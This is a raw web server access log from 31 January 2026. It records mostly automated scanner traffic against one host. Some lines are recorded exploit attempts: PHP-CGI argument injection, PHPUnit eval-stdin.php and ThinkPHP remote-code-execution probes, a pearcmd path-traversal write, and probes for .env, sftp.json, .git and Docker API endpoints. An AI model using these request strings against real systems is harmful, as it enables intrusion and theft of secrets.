Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:06:34:39 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:06:35:16 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:06:57:08 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:06:58:57 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:07:02:00 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:07:09:58 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:07:24:07 +0000] 400 - - http localhost "-" [Client 78.128.112.74] [Length 154] [Gzip -] "-" "-" +[31/Jan/2026:07:25:24 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:07:33:30 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:07:36:54 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:07:46:39 +0000] 200 - GET http fb.profibot.synology.me "/" [Client 104.168.28.15] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "-" +[31/Jan/2026:07:46:49 +0000] 400 - GET http localhost "/" [Client 102.129.85.132] [Length 154] [Gzip -] "-" "-" +[31/Jan/2026:07:46:49 +0000] 400 - GET http 91.82.215.191 "/mftp/application/frontend/css/monsta.css" [Client 102.129.85.132] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.137 Safari/537.36" "-" +[31/Jan/2026:07:46:49 +0000] 400 - GET http 91.82.215.191 "/application/frontend/css/monsta.css" [Client 102.129.85.132] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.137 Safari/537.36" "-" +[31/Jan/2026:07:46:49 +0000] 400 - GET http 91.82.215.191 "/wp-admin/install.php" [Client 102.129.85.132] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.137 Safari/537.36" "-" +[31/Jan/2026:07:46:50 +0000] 400 - GET http 91.82.215.191 "/.env" [Client 102.129.85.132] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.137 Safari/537.36" "-" +[31/Jan/2026:07:46:50 +0000] 400 - GET http 91.82.215.191 "/.vscode/sftp.json" [Client 102.129.85.132] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.137 Safari/537.36" "-" +[31/Jan/2026:07:46:50 +0000] 400 - GET http 91.82.215.191 "/.config/sftp.json" [Client 102.129.85.132] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.137 Safari/537.36" "-" +[31/Jan/2026:07:46:51 +0000] 400 - GET http 91.82.215.191 "/sftp.json" [Client 102.129.85.132] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.137 Safari/537.36" "-" +[31/Jan/2026:07:48:30 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:07:52:42 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:07:57:08 +0000] 404 - GET http 91.82.215.191 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[31/Jan/2026:08:02:00 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:08:03:53 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:08:10:17 +0000] 400 - GET http 91.82.215.191 "/" [Client 185.12.59.118] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0" "-" +[31/Jan/2026:08:11:59 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:08:19:38 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[31/Jan/2026:08:20:36 +0000] 400 - - http localhost "-" [Client 78.128.112.74] [Length 154] [Gzip -] "-" "-" +[31/Jan/2026:08:21:44 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:08:35:56 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:08:38:30 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:08:40:10 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:08:41:53 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:08:44:15 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 45.78.235.71] [Length 154] [Gzip -] "-" "-" +[31/Jan/2026:08:44:16 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 45.78.235.71] [Length 154] [Gzip -] "-" "-" +[31/Jan/2026:08:44:17 +0000] 404 - POST http 91.82.215.191 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:17 +0000] 405 - POST http 91.82.215.191 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 45.78.235.71] [Length 154] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:18 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:19 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:19 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:20 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:21 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:21 +0000] 404 - GET http 91.82.215.191 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:22 +0000] 404 - GET http 91.82.215.191 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:22 +0000] 404 - GET http 91.82.215.191 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:23 +0000] 404 - GET http 91.82.215.191 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:24 +0000] 404 - GET http 91.82.215.191 "/phpunit/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:24 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:25 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:25 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:26 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:26 +0000] 404 - GET http 91.82.215.191 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:27 +0000] 404 - GET http 91.82.215.191 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:28 +0000] 404 - GET http 91.82.215.191 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:28 +0000] 404 - GET http 91.82.215.191 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:29 +0000] 404 - GET http 91.82.215.191 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:29 +0000] 404 - GET http 91.82.215.191 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:30 +0000] 404 - GET http 91.82.215.191 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:30 +0000] 404 - GET http 91.82.215.191 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:31 +0000] 404 - GET http 91.82.215.191 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:32 +0000] 404 - GET http 91.82.215.191 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:32 +0000] 404 - GET http 91.82.215.191 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:33 +0000] 404 - GET http 91.82.215.191 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:34 +0000] 404 - GET http 91.82.215.191 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:34 +0000] 404 - GET http 91.82.215.191 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:35 +0000] 404 - GET http 91.82.215.191 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:35 +0000] 404 - GET http 91.82.215.191 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:36 +0000] 404 - GET http 91.82.215.191 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:36 +0000] 404 - GET http 91.82.215.191 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:37 +0000] 404 - GET http 91.82.215.191 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:38 +0000] 404 - GET http 91.82.215.191 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:38 +0000] 404 - GET http 91.82.215.191 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:39 +0000] 404 - GET http 91.82.215.191 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:40 +0000] 404 - GET http 91.82.215.191 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:40 +0000] 404 - GET http 91.82.215.191 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:41 +0000] 404 - GET http 91.82.215.191 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:42 +0000] 403 - GET http 91.82.215.191 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:42 +0000] 403 - GET http 91.82.215.191 "/index.php?lang=../../../../../../../../tmp/index1" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:44:43 +0000] 404 - GET http 91.82.215.191 "/containers/json" [Client 45.78.235.71] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:08:46:30 +0000] 200 - GET http 91.82.215.191 "/" [Client 185.180.140.4] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[31/Jan/2026:08:46:44 +0000] 404 - GET http 91.82.215.191 "/console" [Client 185.180.140.103] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[31/Jan/2026:08:55:51 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:09:04:49 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:09:06:13 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:09:13:34 +0000] 400 - - http localhost "-" [Client 78.128.112.74] [Length 154] [Gzip -] "-" "-" +[31/Jan/2026:09:21:49 +0000] 200 - GET http 91.82.215.191 "/" [Client 3.134.148.59] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[31/Jan/2026:09:22:26 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.134.148.59] [Length 154] [Gzip -] "-" "-" +[31/Jan/2026:09:22:31 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.134.148.59] [Length 154] [Gzip -] "-" "-" +[31/Jan/2026:09:22:40 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.134.148.59] [Length 154] [Gzip -] "-" "-" +[31/Jan/2026:09:22:43 +0000] 200 - GET http 91.82.215.191 "/" [Client 3.134.148.59] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[31/Jan/2026:09:23:46 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:09:27:13 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 78.29.51.27] [Length 1033] [Gzip -] "IMPORTANT! FREE! NON-CRIMINAL BLOCKCHAIN PHP NEURAL NETWORK! OWN CRYPTO, GIFT, CAPITALIST AND BLOCKCHAIN SCIENTIFIC DEBT GATEWAYS! OWN HOSTING AND ENCRYPTED DATABASE! LINK - http://78.29.51.27/phpneuralnetwork/?s1=CU_profibot.direct.quickconnect.to" "http://78.29.51.27/phpneuralnetwork/?s1=CU_profibot.direct.quickconnect.to" +[31/Jan/2026:09:27:32 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.134.148.59] [Length 0] [Gzip -] "-" "-" +[31/Jan/2026:09:27:58 +0000] 404 - GET http 91.82.215.191 "/druid/index.html" [Client 13.86.113.214] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[31/Jan/2026:09:30:46 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.69] [Length 1033] [Gzip -] "-" "-" +[31/Jan/2026:09:31:21 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:09:33:56 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:09:35:16 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:09:35:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 64.62.197.2] [Length 154] [Gzip -] "-" "-" +[31/Jan/2026:09:40:09 +0000] 400 - - http localhost "-" [Client 87.251.75.163] [Length 154] [Gzip -] "-" "-" +[31/Jan/2026:09:40:51 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:09:43:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 87.121.84.51] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[31/Jan/2026:09:50:31 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:09:51:39 +0000] 200 - GET http 91.82.215.191 "/" [Client 109.105.8.93] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" +[31/Jan/2026:09:51:39 +0000] 404 - GET http www.msftncsi.com "/ncsi.txt" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[31/Jan/2026:09:51:39 +0000] 404 - GET http 91.82.215.191 "/HNAP1/" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[31/Jan/2026:09:51:39 +0000] 404 - GET http 91.82.215.191 "/sqlite/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[31/Jan/2026:09:51:39 +0000] 404 - GET http 91.82.215.191 "/sqlitemanager/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[31/Jan/2026:09:51:39 +0000] 404 - GET http 91.82.215.191 "/SQLiteManager/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[31/Jan/2026:09:51:39 +0000] 404 - GET http 91.82.215.191 "/SQLite/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[31/Jan/2026:09:51:39 +0000] 404 - GET http 91.82.215.191 "/SQlite/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[31/Jan/2026:09:51:39 +0000] 404 - GET http 91.82.215.191 "/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[31/Jan/2026:09:51:39 +0000] 404 - GET http 91.82.215.191 "/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[31/Jan/2026:09:51:39 +0000] 404 - GET http 91.82.215.191 "/SQLiteManager-1.2.4/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[31/Jan/2026:09:51:39 +0000] 404 - GET http 91.82.215.191 "/agSearch/SQlite/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[31/Jan/2026:09:53:57 +0000] 404 - GET http 91.82.215.191 "/.git/refs/heads/" [Client 185.241.208.170] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 9; SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" +[31/Jan/2026:09:54:44 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:09:57:48 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.69] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:10:01:52 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 